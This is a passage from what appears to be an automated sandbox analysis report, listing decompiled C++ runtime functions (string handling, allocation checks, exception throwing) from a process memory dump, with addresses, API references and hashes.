					if(_t33 != 0) {
						goto L6;
					} else {
						 *((intOrPtr*)(_t38 + 0x10)) = _t33;
						if(_t15 < 0x10) {
							_t21 = _t38;
							 *_t21 = 0;
							return _t21;
						} else {
							 *((char*)( *_t38)) = 0;
							return _t38;
						}
					}
				} else {
					E29D89750(_t38, _t33, _t28);
					if(_t33 == 0) {
						L16:
						return _t38;
					} else {
						L6:
						_t29 =  *((intOrPtr*)(_t38 + 0x10));
						if( *((intOrPtr*)(_t38 + 0x14)) < 0x10) {
							_t16 = _t38;
						} else {
							_t16 =  *_t38;
						}
						 *((char*)(_t16 + _t29)) = _t27;
						 *((intOrPtr*)(_t38 + 0x10)) = _t33;
						if( *((intOrPtr*)(_t38 + 0x14)) < 0x10) {
							 *((char*)(_t38 + _t33)) = 0;
							goto L16;
						} else {
							 *((char*)( *_t38 + _t33)) = 0;
							return _t38;
						}
					}
				}
			}











                                        0x29da08e0
                                        0x29da08e0
                                        0x29da08e0
                                        0x29da08eb
                                        0x29da08f2
                                        0x29da08f2
                                        0x29da08f8
                                        0x29da08fe
                                        0x29da0905
                                        0x29da0905
                                        0x29da090a
                                        0x29da090f
                                        0x29da0931
                                        0x00000000
                                        0x29da0933
                                        0x29da0933
                                        0x29da0939
                                        0x29da0944
                                        0x29da0946
                                        0x29da094a
                                        0x29da093b
                                        0x29da093d
                                        0x29da0943
                                        0x29da0943
                                        0x29da0939
                                        0x29da0911
                                        0x29da0915
                                        0x29da091c
                                        0x29da0968
                                        0x29da096b
                                        0x29da091e
                                        0x29da091e
                                        0x29da091e
                                        0x29da0929
                                        0x29da094b
                                        0x29da092b
                                        0x29da092b
                                        0x29da092b
                                        0x29da094d
                                        0x29da0950
                                        0x29da0956
                                        0x29da0964
                                        0x00000000
                                        0x29da0958
                                        0x29da095a
                                        0x29da0961
                                        0x29da0961
                                        0x29da0956
                                        0x29da091c

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA08F2
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD455
                                          • Part of subcall function 29DAD440: __CxxThrowException@8.LIBCMT ref: 29DAD46A
                                          • Part of subcall function 29DAD440: std::exception::exception.LIBCMT ref: 29DAD47B
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29DA0905
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                        • String ID: string too long
                                        • API String ID: 963545896-2556327735
                                        • Opcode ID: f4254de567d461dfb0b7747302c1ef447a79fc8d1e941fbeddc265fc4afdbfaf
                                        • Instruction ID: 6bac4dbd9fb498444ab1584f00ab6fd2aebd272bd69d451cb78b945571e0feab
                                        • Opcode Fuzzy Hash: f4254de567d461dfb0b7747302c1ef447a79fc8d1e941fbeddc265fc4afdbfaf
                                        • Instruction Fuzzy Hash: E81152313146408BE3258F2DE840609B7E1AFDA720F980B6DE0D597A95CB71E857E7A1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D979F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E29D979F0(void* __eax, signed int __ecx, intOrPtr* __esi) {
				intOrPtr _t16;
				void* _t17;
				signed int _t25;
				intOrPtr* _t28;
				signed int _t30;
				intOrPtr _t34;
				intOrPtr* _t35;
				void* _t38;
				intOrPtr* _t39;

				_t39 = __esi;
				_t30 = __ecx;
				_t38 = __eax;
				_t16 =  *((intOrPtr*)(__esi + 0x10));
				if(_t16 < __ecx) {
					_t16 = E29DAD48D("invalid string position");
				}
				_t17 = _t16 - _t30;
				if(_t17 < _t38) {
					_t38 = _t17;
				}
				if(_t38 == 0) {
					L14:
					return _t39;
				} else {
					_t34 =  *((intOrPtr*)(_t39 + 0x14));
					if(_t34 < 8) {
						_t28 = _t39;
					} else {
						_t28 =  *_t39;
					}
					if(_t34 < 8) {
						_t35 = _t39;
					} else {
						_t35 =  *_t39;
					}
					E29DAE1F0(_t35 + _t30 * 2, _t28 + (_t30 + _t38) * 2, _t17 - _t38 + _t17 - _t38);
					_t25 =  *(_t39 + 0x10) - _t38;
					 *(_t39 + 0x10) = _t25;
					if( *((intOrPtr*)(_t39 + 0x14)) < 8) {
						 *((short*)(_t39 + _t25 * 2)) = 0;
						goto L14;
					} else {
						 *((short*)( *_t39 + _t25 * 2)) = 0;
						return _t39;
					}
				}
			}












                                        0x29d979f0
                                        0x29d979f0
                                        0x29d979f1
                                        0x29d979f3
                                        0x29d979f8
                                        0x29d979ff
                                        0x29d979ff
                                        0x29d97a04
                                        0x29d97a08
                                        0x29d97a0a
                                        0x29d97a0a
                                        0x29d97a0e
                                        0x29d97a65
                                        0x29d97a68
                                        0x29d97a10
                                        0x29d97a10
                                        0x29d97a17
                                        0x29d97a1d
                                        0x29d97a19
                                        0x29d97a19
                                        0x29d97a19
                                        0x29d97a22
                                        0x29d97a28
                                        0x29d97a24
                                        0x29d97a24
                                        0x29d97a24
                                        0x29d97a3a
                                        0x29d97a45
                                        0x29d97a4b
                                        0x29d97a4f
                                        0x29d97a61
                                        0x00000000
                                        0x29d97a51
                                        0x29d97a55
                                        0x29d97a5c
                                        0x29d97a5c
                                        0x29d97a4f

                                        APIs
                                        • std::_Xinvalid_argument.LIBCPMT ref: 29D979FF
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4A2
                                          • Part of subcall function 29DAD48D: __CxxThrowException@8.LIBCMT ref: 29DAD4B7
                                          • Part of subcall function 29DAD48D: std::exception::exception.LIBCMT ref: 29DAD4C8
                                        • _memmove.LIBCMT ref: 29D97A3A
                                        Strings
                                        • invalid string position, xrefs: 29D979FA
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                        • String ID: invalid string position
                                        • API String ID: 1785806476-1799206989
                                        • Opcode ID: b800cdf8ff36ebdaa1379817823cd6570c7a28e39c67dac27fe375c1a367fba2
                                        • Instruction ID: 233a81e0f98693325a32a997457170788c665dac0320ec2798d0d2e39de98edd
                                        • Opcode Fuzzy Hash: b800cdf8ff36ebdaa1379817823cd6570c7a28e39c67dac27fe375c1a367fba2
                                        • Instruction Fuzzy Hash: 24019E313206118BD321DF3CEC8081AB3E6BFC46443205E2DD18AE7E19EB30EA179790
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DB24F3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 86%
                                        			E29DB24F3(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t17;
				intOrPtr* _t28;
				void* _t29;

				_t28 = __esi;
				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
				E29DB06A3(__edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
				 *((intOrPtr*)(E29DB524B(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
				_t17 = E29DB524B(__ebx, __edx, __eflags);
				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
					_t17 =  *((intOrPtr*)(__esi + 0x14));
					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
								_t17 = E29DB067C(_t37,  *((intOrPtr*)(_t28 + 0x18)));
								_t38 = _t17;
								if(_t17 != 0) {
									_push( *((intOrPtr*)(_t29 + 0x10)));
									_push(_t28);
									return E29DB227A(_t38);
								}
							}
						}
					}
				}
				return _t17;
			}






                                        0x29db24f3
                                        0x29db24f6
                                        0x29db24fc
                                        0x29db250a
                                        0x29db2510
                                        0x29db2518
                                        0x29db2524
                                        0x29db252c
                                        0x29db2534
                                        0x29db2548
                                        0x29db254a
                                        0x29db254e
                                        0x29db2553
                                        0x29db2559
                                        0x29db255b
                                        0x29db255d
                                        0x29db2560
                                        0x00000000
                                        0x29db2567
                                        0x29db255b
                                        0x29db254e
                                        0x29db2548
                                        0x29db2534
                                        0x29db2568

                                        APIs
                                          • Part of subcall function 29DB06A3: __getptd.LIBCMT ref: 29DB06A9
                                          • Part of subcall function 29DB06A3: __getptd.LIBCMT ref: 29DB06B9
                                        • __getptd.LIBCMT ref: 29DB2502
                                          • Part of subcall function 29DB524B: __getptd_noexit.LIBCMT ref: 29DB524E
                                          • Part of subcall function 29DB524B: __amsg_exit.LIBCMT ref: 29DB525B
                                        • __getptd.LIBCMT ref: 29DB2510
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                        • String ID: csm
                                        • API String ID: 803148776-1018135373
                                        • Opcode ID: 78d30a92102415e2b3a649192633f7c4b97c0873314cca7602c9d865b31b545e
                                        • Instruction ID: cb6055343e08d5265285050348f863452ae0ee8202429972f4364fa38fe0fe2e
                                        • Opcode Fuzzy Hash: 78d30a92102415e2b3a649192633f7c4b97c0873314cca7602c9d865b31b545e
                                        • Instruction Fuzzy Hash: C7014B768013059ACF29CF60C47479EB7F5BF34211F90982ED6839EA61CB309686EB51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D89660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E29D89660(signed int __ecx, void* __edi, void* __esi) {
				char _v8;
				char _v20;
				void* _t6;
				void* _t14;
				void* _t18;

				_t6 = 0;
				if(__ecx != 0) {
					_t25 = __ecx - 0x3c3c3c3;
					if(__ecx > 0x3c3c3c3) {
						L3:
						_v8 = 0;
						E29DAE0FC( &_v20,  &_v8);
						_v20 = 0x29dc52ac;
						return E29DAFF06( &_v20, 0x29dd2028);
					}
					_t6 = E29DAE70E(_t14, _t18, __edi, __esi, _t25, (__ecx << 4) + __ecx + (__ecx << 4) + __ecx + (__ecx << 4) + __ecx + (__ecx << 4) + __ecx);
					if(0 == 0) {
						goto L3;
					}
				}
				return _t6;
			}








                                        0x29d89666
                                        0x29d8966a
                                        0x29d8966c
                                        0x29d89672
                                        0x29d8968c
                                        0x29d89693
                                        0x29d8969a
                                        0x29d896a8
                                        0x00000000
                                        0x29d896af
                                        0x29d89680
                                        0x29d8968a
                                        0x00000000
                                        0x00000000
                                        0x29d8968a
                                        0x29d896b7

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D8969A
                                        • __CxxThrowException@8.LIBCMT ref: 29D896AF
                                          • Part of subcall function 29DAE70E: _malloc.LIBCMT ref: 29DAE728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                        • String ID: )
                                        • API String ID: 4063778783-2427484129
                                        • Opcode ID: 3cc6b942f3775f8b857029ccb7a422d825115a31ff9cc6d0eefedfc8c3d67682
                                        • Instruction ID: a497030af127ed2ff3a175f153c381f626c18be1f5e3cab586a9be72e61b60d3
                                        • Opcode Fuzzy Hash: 3cc6b942f3775f8b857029ccb7a422d825115a31ff9cc6d0eefedfc8c3d67682
                                        • Instruction Fuzzy Hash: 4FF0A0F690010A66EB08E6A4CD46ABEB264AF20140F00457CD951E2A01FA34D61BA1A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA22E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E29DA22E0(signed int __ecx, void* __edi, void* __esi) {
				char _v8;
				char _v20;
				void* _t7;
				void* _t14;
				void* _t18;

				_t7 = 0;
				if(__ecx != 0) {
					_t25 = __ecx - 0x9249249;
					if(__ecx > 0x9249249) {
						L3:
						_v8 = 0;
						E29DAE0FC( &_v20,  &_v8);
						_v20 = 0x29dc52ac;
						return E29DAFF06( &_v20, 0x29dd2028);
					}
					_t7 = E29DAE70E(_t14, _t18, __edi, __esi, _t25, __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx + __ecx * 8 - __ecx);
					if(0 == 0) {
						goto L3;
					}
				}
				return _t7;
			}








                                        0x29da22e6
                                        0x29da22ea
                                        0x29da22ec
                                        0x29da22f2
                                        0x29da230e
                                        0x29da2315
                                        0x29da231c
                                        0x29da232a
                                        0x00000000
                                        0x29da2331
                                        0x29da2302
                                        0x29da230c
                                        0x00000000
                                        0x00000000
                                        0x29da230c
                                        0x29da2339

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29DA231C
                                        • __CxxThrowException@8.LIBCMT ref: 29DA2331
                                          • Part of subcall function 29DAE70E: _malloc.LIBCMT ref: 29DAE728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                        • String ID: )
                                        • API String ID: 4063778783-2427484129
                                        • Opcode ID: 5b75bfb79b5afc9dedae43d0119195a09580f808b71db49bb77f27765cd991c7
                                        • Instruction ID: 9bae5deef63c40559f23f417ef14a73064b5e7bcb7c0d856022105311f939d8d
                                        • Opcode Fuzzy Hash: 5b75bfb79b5afc9dedae43d0119195a09580f808b71db49bb77f27765cd991c7
                                        • Instruction Fuzzy Hash: 17F0E5B690110AAADB0CEBF69D56BBEB3B8EF11110F50056DD901D2900FB34D32AE6B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D898C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E29D898C0(void* __edi, void* __esi, char _a4) {
				char _v16;
				void* _t7;
				void* _t11;
				char _t12;
				void* _t15;

				_t12 = _a4;
				_t7 = 0;
				if(_t12 != 0) {
					_t22 = _t12 - 0xffffffff;
					if(_t12 > 0xffffffff) {
						L3:
						_a4 = 0;
						E29DAE0FC( &_v16,  &_a4);
						_v16 = 0x29dc52ac;
						return E29DAFF06( &_v16, 0x29dd2028);
					}
					_t7 = E29DAE70E(_t11, _t15, __edi, __esi, _t22, _t12);
					if(0 == 0) {
						goto L3;
					}
				}
				return _t7;
			}








                                        0x29d898c3
                                        0x29d898c9
                                        0x29d898cd
                                        0x29d898cf
                                        0x29d898d2
                                        0x29d898e1
                                        0x29d898e8
                                        0x29d898ef
                                        0x29d898fd
                                        0x00000000
                                        0x29d89904
                                        0x29d898d5
                                        0x29d898df
                                        0x00000000
                                        0x00000000
                                        0x29d898df
                                        0x29d8990c

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D898EF
                                        • __CxxThrowException@8.LIBCMT ref: 29D89904
                                          • Part of subcall function 29DAE70E: _malloc.LIBCMT ref: 29DAE728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                        • String ID: )
                                        • API String ID: 4063778783-2427484129
                                        • Opcode ID: 7662c70a690011dc8bcff69e0f167c27642bec5a0e1e8fba3d95768bbb95ce99
                                        • Instruction ID: bf10ca6e5ff60082727c2e5374ce512190167c4b53630cb8da9691f323d29e83
                                        • Opcode Fuzzy Hash: 7662c70a690011dc8bcff69e0f167c27642bec5a0e1e8fba3d95768bbb95ce99
                                        • Instruction Fuzzy Hash: 71E065B690020D76CB08EFB4D895A9EB768AF20210F00966DED1592A41FE30D21AE6B5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D97C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E29D97C70(void* __ecx, void* __edi, void* __esi) {
				char _v8;
				char _v20;
				void* _t7;
				void* _t11;
				void* _t15;

				_t7 = 0;
				if(__ecx != 0) {
					_t22 = __ecx - 0x7fffffff;
					if(__ecx > 0x7fffffff) {
						L3:
						_v8 = 0;
						E29DAE0FC( &_v20,  &_v8);
						_v20 = 0x29dc52ac;
						return E29DAFF06( &_v20, 0x29dd2028);
					}
					_t7 = E29DAE70E(_t11, _t15, __edi, __esi, _t22, __ecx + __ecx);
					if(0 == 0) {
						goto L3;
					}
				}
				return _t7;
			}








                                        0x29d97c76
                                        0x29d97c7a
                                        0x29d97c7c
                                        0x29d97c82
                                        0x29d97c94
                                        0x29d97c9b
                                        0x29d97ca2
                                        0x29d97cb0
                                        0x00000000
                                        0x29d97cb7
                                        0x29d97c88
                                        0x29d97c92
                                        0x00000000
                                        0x00000000
                                        0x29d97c92
                                        0x29d97cbf

                                        APIs
                                        • std::exception::exception.LIBCMT ref: 29D97CA2
                                        • __CxxThrowException@8.LIBCMT ref: 29D97CB7
                                          • Part of subcall function 29DAE70E: _malloc.LIBCMT ref: 29DAE728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                        • String ID: )
                                        • API String ID: 4063778783-2427484129
                                        • Opcode ID: 6d4f9a048ad51a6e46c2cef3f83ed372e031ab4bee97da360b09ae74a87c3db0
                                        • Instruction ID: c986f80aa265450cb27a48c8088a04a530e0e9a318723115d1f3473fbecf80b1
                                        • Opcode Fuzzy Hash: 6d4f9a048ad51a6e46c2cef3f83ed372e031ab4bee97da360b09ae74a87c3db0
                                        • Instruction Fuzzy Hash: 5BE02BB5800209A2DB08F7F08D41ABFB378AF10101F500A6DE82193D41FB70922BE1B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%